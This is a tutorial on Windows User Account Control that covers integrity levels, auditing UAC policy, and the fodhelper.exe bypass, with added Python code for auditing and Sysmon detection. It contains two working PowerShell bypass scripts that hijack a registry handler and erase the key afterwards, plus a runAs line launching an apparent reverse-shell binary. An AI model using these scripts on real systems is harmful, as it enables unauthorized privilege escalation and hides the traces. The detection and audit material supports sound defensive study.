User Account Control (UAC) is an access control system that forces applications and tasks to run in the context of a non-administrative account until an administrator authorizes elevated access.
UAC was first introduced in Windows Vista and attracted complaints from users due to the frequency and annoyance of the popups, which led Microsoft to introduce some relaxations.
Mandatory Levels
There are three types of Mandatory Level. The level of the current process appears in the `whoami /all` group listing as a `Mandatory Label` entry:
```
whoami /all

GROUP INFORMATION
-----------------

Group Name                           Type             SID          Attributes
==================================== ================ ============ ==================================================
Everyone                             Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users         Alias            S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE             Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
LOCAL                                Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication     Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Low Mandatory Level  Unknown SID type S-1-16-4096  Mandatory group, Enabled by default, Enabled group
```
- Low Mandatory Level: processes such as Internet Explorer run with almost no permissions and cannot write to arbitrary directories, yet IE, for example, still needs somewhere to write its cache. At Low Mandatory Level a process can only write data under the following path:
  `C:\Users\Victim\AppData\LocalLow`
- Medium Mandatory Level: the permissions of a normal user.
- High Mandatory Level: the permissions of NT AUTHORITY\SYSTEM.
UAC Bypass
Some of Windows' own trusted, signed applications are able to "auto-elevate" without consent under certain conditions.
The default configuration for UAC is "Prompt for consent for non-Windows binaries", but it can also be set to "Prompt for credentials", "Prompt for consent" or "Elevate without prompting".
We can check the UAC configuration with PowerShell:
```powershell
$path = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
$filter="ConsentPromptBehaviorAdmin|ConsentPromptBehaviorUser|EnableInstallerDetection|EnableLUA|EnableVirtualization|PromptOnSecureDesktop|ValidateAdminCodeSignatures|FilterAdministratorToken"
(Get-ItemProperty $path).psobject.properties | where {$_.name -match $filter} | select name,value
```

```
Name                        Value
----                        -----
ConsentPromptBehaviorAdmin  5
ConsentPromptBehaviorUser   3
EnableInstallerDetection    1
EnableLUA                   1
EnableVirtualization        1
PromptOnSecureDesktop       1
ValidateAdminCodeSignatures 0
```
We are interested in the ConsentPromptBehaviorAdmin parameter.
| Value | Meaning |
|---|---|
| 0 | Elevate without prompting |
| 1 | Prompt for credentials (Secure Desktop) |
| 2 | Prompt for consent (Secure Desktop) |
| 3 | Prompt for credentials |
| 4 | Prompt for consent |
| 5 (Default) | Prompt for consent for non-Windows binaries |
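The table above is easy to read by hand for one host, but a defender usually wants the exported values rated automatically across many hosts. The following added example (not code from the original page) parses the "Name Value" listing that the PowerShell one-liner prints and flags the settings that weaken UAC; the fallbacks for absent values are the Windows defaults, and `SAMPLE_LISTING` is constructed to mirror the page's own output.

```python
"""Audit the UAC policy values that the Get-ItemProperty one-liner prints.

Added example, not code from the original page: it parses the "Name Value"
listing and rates each setting from a defender's point of view. SAMPLE_LISTING
is constructed to mirror the page's output.
"""
import re

# ConsentPromptBehaviorAdmin values, as tabulated on the page.
ADMIN_PROMPT = {
    0: "Elevate without prompting",
    1: "Prompt for credentials (Secure Desktop)",
    2: "Prompt for consent (Secure Desktop)",
    3: "Prompt for credentials",
    4: "Prompt for consent",
    5: "Prompt for consent for non-Windows binaries",
}

SAMPLE_LISTING = """\
Name Value
---- -----
ConsentPromptBehaviorAdmin 5
ConsentPromptBehaviorUser 3
EnableInstallerDetection 1
EnableLUA 1
EnableVirtualization 1
PromptOnSecureDesktop 1
ValidateAdminCodeSignatures 0
"""


def parse_listing(text):
    """Turn 'Name Value' rows into {name: int}; header and ruler lines are skipped."""
    settings = {}
    for line in text.splitlines():
        match = re.match(r"^(\w+)\s+(\d+)$", line.strip())
        if match:
            settings[match.group(1)] = int(match.group(2))
    return settings


def audit_uac(settings):
    """Return (severity, finding) tuples; absent values fall back to Windows defaults."""
    findings = []
    if settings.get("EnableLUA", 1) == 0:
        findings.append(("high", "EnableLUA=0: UAC is switched off, so administrators always run at High integrity"))
    admin = settings.get("ConsentPromptBehaviorAdmin", 5)
    if admin == 0:
        findings.append(("high", "ConsentPromptBehaviorAdmin=0: " + ADMIN_PROMPT[0]))
    elif admin == 5:
        findings.append(("info", "ConsentPromptBehaviorAdmin=5: " + ADMIN_PROMPT[5]
                         + "; signed Windows binaries with autoElevate=true elevate silently"))
    # Values 1 and 2 (Secure Desktop) are the hardened choices and raise no finding.
    if settings.get("PromptOnSecureDesktop", 1) == 0:
        findings.append(("medium", "PromptOnSecureDesktop=0: the consent dialog is drawn on the interactive desktop, where other processes can draw over or drive it"))
    if settings.get("FilterAdministratorToken", 0) == 0:
        findings.append(("medium", "FilterAdministratorToken=0: the built-in Administrator account runs with a full token and never sees a UAC prompt"))
    if settings.get("ValidateAdminCodeSignatures", 0) == 0:
        findings.append(("info", "ValidateAdminCodeSignatures=0: unsigned executables may still request elevation"))
    return findings


def is_hardened(settings):
    """True when the policy raises neither high nor medium findings."""
    return all(sev == "info" for sev, _ in audit_uac(settings))


if __name__ == "__main__":
    for severity, finding in audit_uac(parse_listing(SAMPLE_LISTING)):
        print(f"[{severity}] {finding}")
```

Feed it the saved output of the PowerShell snippet from each host; a "high" finding means UAC is effectively absent, while the "info" finding on the default value 5 is the condition the fodhelper technique below relies on, so it is worth tracking even though it is the out-of-the-box setting.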
A UAC bypass is a technique by which an application can go from Medium Integrity to High Integrity without prompting for consent.
fodhelper.exe
fodhelper.exe is a Microsoft support application responsible for managing language changes in the operating system. This binary runs as high integrity on Windows 10.
With sigcheck.exe from Sysinternals it is possible to inspect the application manifest:
```
sigcheck.exe -a -m C:\Windows\System32\fodhelper.exe
```
Note: look in the manifest for `requestedExecutionLevel` set to `requireAdministrator` and `autoElevate` set to `true`.
```powershell
#This UAC bypass tries to execute your command with elevated privileges using fodhelper.exe
$command = "C:\Windows\System32\cmd.exe"
#Adding all the registry entries required for your command.
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $command -Force
#Starts the fodhelper process to execute your command.
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
#Cleaning up the mess created.
Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force
```
There is an alternative packaged as a .ps1 function:
```powershell
<#
.SYNOPSIS
This script can bypass User Account Control (UAC) via fodhelper.exe
It creates a new registry structure in: "HKCU:\Software\Classes\ms-settings\" to perform UAC bypass and starts
an elevated command prompt.
.EXAMPLE
Load "cmd /c start C:\Windows\System32\cmd.exe" (the default):
FodhelperUACBypass
Load specific application:
FodhelperUACBypass -program "cmd.exe"
FodhelperUACBypass -program "cmd.exe /c powershell.exe"
#>
function FodhelperUACBypass(){
    Param (
        [String]$program = "cmd /c start C:\Windows\System32\cmd.exe" #default
    )
    #Create Registry Structure
    New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
    New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
    Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $program -Force
    #Start fodhelper.exe
    Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
    #Cleanup
    Start-Sleep 3
    Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force
}
```
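Both fodhelper scripts leave the same footprint: a handler for `ms-settings` written under the user's own hive (a key that does not normally exist under HKCU), followed within seconds by a start of `fodhelper.exe`, and then the key is deleted again. The added example below (not part of the original page) turns that sequence into a detection. It assumes Sysmon registry events (ID 12 for key create/delete, ID 13 for value set) and process-creation events (ID 1) exported as one JSON object per line with Sysmon's field names (EventID, UtcTime, User, Image, TargetObject, Details); Sysmon reports the HKCU hive as `HKU\<user SID>`. The events in `SAMPLE_EVENTS` are constructed.

```python
"""Detect the fodhelper.exe registry hijack in Sysmon-style events.

Added example, not part of the original page. Input is one JSON object per
line using Sysmon's field names (EventID, UtcTime, User, Image, TargetObject,
Details). SAMPLE_EVENTS is constructed; the user SID is made up.
"""
import json
from datetime import datetime, timedelta

# The bypass plants this key under the user's hive; it does not normally exist there.
HIJACK_KEY = "\\software\\classes\\ms-settings\\shell\\open\\command"
CORRELATION_WINDOW = timedelta(seconds=60)

SID = "HKU\\S-1-5-21-1111-2222-3333-1001"  # constructed user SID
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"EventID": 13, "UtcTime": "2024-01-01 10:00:01.000", "User": "LAB\\victim",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "TargetObject": SID + "\\Software\\Classes\\ms-settings\\Shell\\Open\\command\\DelegateExecute",
     "Details": ""},
    {"EventID": 13, "UtcTime": "2024-01-01 10:00:01.200", "User": "LAB\\victim",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "TargetObject": SID + "\\Software\\Classes\\ms-settings\\Shell\\Open\\command\\(Default)",
     "Details": "C:\\Windows\\System32\\cmd.exe"},
    {"EventID": 1, "UtcTime": "2024-01-01 10:00:02.500", "User": "LAB\\victim",
     "Image": "C:\\Windows\\System32\\fodhelper.exe", "IntegrityLevel": "High"},
    # Benign noise: an unrelated per-user file association and a legitimate fodhelper run.
    {"EventID": 13, "UtcTime": "2024-01-01 10:05:00.000", "User": "LAB\\alice",
     "Image": "C:\\Windows\\explorer.exe",
     "TargetObject": SID + "\\Software\\Classes\\.txt\\(Default)", "Details": "txtfile"},
    {"EventID": 1, "UtcTime": "2024-01-01 10:05:03.000", "User": "LAB\\alice",
     "Image": "C:\\Windows\\System32\\fodhelper.exe", "IntegrityLevel": "High"},
])


def parse_time(text):
    return datetime.strptime(text, "%Y-%m-%d %H:%M:%S.%f")


def detect_fodhelper_hijack(lines):
    """Return one alert per user who staged the ms-settings handler and then launched fodhelper.exe."""
    staged = {}   # user -> {"when": first write, "writer": image, "command": (Default) value}
    alerts = []
    for line in lines.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        when, user = parse_time(ev["UtcTime"]), ev["User"]
        target = ev.get("TargetObject", "").lower()
        if ev["EventID"] in (12, 13) and HIJACK_KEY in target:
            # Stage 1: a handler for ms-settings: is written into the user's hive.
            entry = staged.setdefault(user, {"when": when, "writer": ev["Image"], "command": None})
            if target.endswith("\\(default)"):
                entry["command"] = ev.get("Details")
        elif ev["EventID"] == 1 and ev["Image"].lower().endswith("\\fodhelper.exe"):
            # Stage 2: the auto-elevating binary starts shortly after the write.
            entry = staged.get(user)
            if entry and when - entry["when"] <= CORRELATION_WINDOW:
                alerts.append({"user": user, "writer": entry["writer"],
                               "command": entry["command"], "fodhelper_started": ev["UtcTime"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_fodhelper_hijack(SAMPLE_EVENTS):
        print(alert)
```

The registry write on its own is already a strong signal and could be alerted on directly; correlating it with the fodhelper.exe start mainly adds the command that was handed to the elevated process, which is what the responder needs first. Sysmon only emits registry events for paths its configuration includes, so the `RegistryEvent` rules must cover `Software\Classes\ms-settings` for the first stage to be visible at all.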
Start-Process RunAs
It is possible to execute a command as administrator if we have access to the GUI, since the consent prompt has to be accepted there:
```powershell
Start-Process powershell -ArgumentList "-NoProfile", "-Command", "c:\windows\temp\rshell.exe" -Verb runAs
```